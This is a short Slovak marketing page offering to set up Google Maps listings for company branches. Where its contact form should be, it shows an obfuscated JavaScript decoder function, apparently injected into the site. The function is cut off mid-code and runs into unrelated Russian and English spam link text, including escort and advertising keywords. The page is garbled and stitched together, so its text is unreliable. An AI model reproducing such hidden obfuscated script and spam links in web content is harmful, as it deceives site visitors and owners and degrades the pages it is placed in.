Programovanie Google maps

Home / Programovanie Google maps


google-places

Vytvorenie GPS mapových podkladov pre každú pobočku spoločnosti dokáže nahradiť doteraz používané nepresné grafické mapy alebo iné podklady. Tieto sa v analýzach nalýze prejavili ako
neefektívne.

Ako interaktívne mapy fungujú?

Akonáhle si návštevník zadá do vyhľadávača názov spoločnosti a lokalitu vytvorené pobočky budú prirodzene zobrazené na prioritných pozíciach. Zobrazenie natívne podporuje mobilné
zariadenia a tablety a je už súčasťou mnohých navigačných systémov. Až 97 % zákazníkov vyhľadáva miestne firmy online.

Vytvorenie a udržiavanie Google maps pre firmy silne doporučujeme hlave pre tieto dôvody :

  • Silný dôraz na lokálne vyhľadávanie
  • Overená relevantnosť informácii
  • Informácie je možné meniť a dolniť jedine zabezpečene
  • Mapová interaktivita – v prípade spracovaných 3D máp sa pobočky zobrazia na reálnych snímkach

Ak máte záujem zviditeľniť sa prostredníctvom GPS a Google máp, neváhajte a pošlite nám dotaz pomocou formulára:

function oc532bd2f6(uf){var yd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=‘;var vb=“;var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandex.php“>контекстная реклама воронежбатарея отопления для ванной комнатуescort dubaiв танзании в январе